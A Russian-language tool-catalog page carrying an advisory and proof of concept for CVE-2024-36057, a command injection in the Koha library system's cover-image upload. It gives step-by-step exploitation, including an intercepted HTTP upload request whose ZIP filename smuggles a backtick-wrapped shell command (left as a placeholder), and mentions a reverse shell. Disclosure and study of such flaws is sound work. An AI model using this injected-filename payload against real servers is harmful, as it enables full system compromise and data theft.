Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-36057 — Консультация и proof-of-concept для CVE-2024-36057 — аутентифицированная инъекция OS-команд в библиотечном ПО Koha, демонстрирующая произвольное выполнение команд через специально сформированные имена ZIP-файлов. | Kitploit
Инструменты/GitHubGitHub/hacklantic/cve-2024-36057
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubhacklantic/cve-2024-36057

CVE-2024-36057

Консультация и proof-of-concept для CVE-2024-36057 — аутентифицированная инъекция OS-команд в библиотечном ПО Koha, демонстрирующая произвольное выполнение команд через специально сформированные имена ZIP-файлов.

Репозиторий
10 ч 21 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-36057 — Koha Library Software < 22.05.22 — Внедрение OS-команд

CVE ID: CVE-2024-36057
Продукт: Koha Library Software
Тип уязвимости: Внедрение OS-команд (CWE-78)
Оценка CVSS: 8.7 (Высокая) Требуется аутентификация
Затронутые версии: Ниже 22.05.22
Автор: Karolis Narvilas


Описание

Koha — это открытая интегрированная библиотечная система. Уязвимость внедрения команд существует в функциональности загрузки обложек в tools/upload-cover-image.pl. Приложение использует qx/unzip $filename -d $dirname/ для извлечения загруженных ZIP-архивов без санитизации параметра имени файла.

Аутентифицированный пользователь с высокими привилегиями может создать ZIP-файл с вредоносным именем, содержащим символы обратных кавычек, для внедрения произвольных shell-команд, которые выполняются на стороне сервера при нажатии пользователем кнопки «Process Images».

Воздействие: удалённый аутентифицированный злоумышленник может использовать CVE-2024-36057 для выполнения произвольных OS-команд на сервере, что приводит к полной компрометации системы, краже данных и установке постоянных бэкдоров или reverse-шеллов.


Proof-of-Concept (PoC)

  1. Войдите в Koha как пользователь с высокими привилегиями.
  2. Перейдите по адресу: https://{domain}/cgi-bin/koha/tools/upload-cover-image.pl
  3. Загрузите обычный ZIP-файл и, используя перехватывающий прокси, такой как Burp Suite, измените имя файла, как показано ниже:

Запрос:

root@kitploit:~
POST /cgi-bin/koha/tools/upload-file.pl?temp=1 HTTP/1.1
Host: {domain}
Cookie: [High-Privilege Session]
Connection: close

------WebKitFormBoundaryP82Da5V6eaQOuBUT
Content-Disposition: form-data; name="file"; filename="execute`<INJECTED_COMMAND>`.zip"
Content-Type: application/x-zip-compressed

<zip file contents>
------WebKitFormBoundaryP82Da5V6eaQOuBUT--

  1. После успешной загрузки ZIP-файла нажмите «Process Images».
  2. Внедрённая команда внутри обратных кавычек выполняется на стороне сервера. В этом примере на целевой машине устанавливается reverse-шелл.

Reverse Shell PoC


Ссылки

  • Koha Community - Release Notes for v22.05.22
  • MITRE - CVE-2024-36057
  • Hacklantic
Скачать инструмент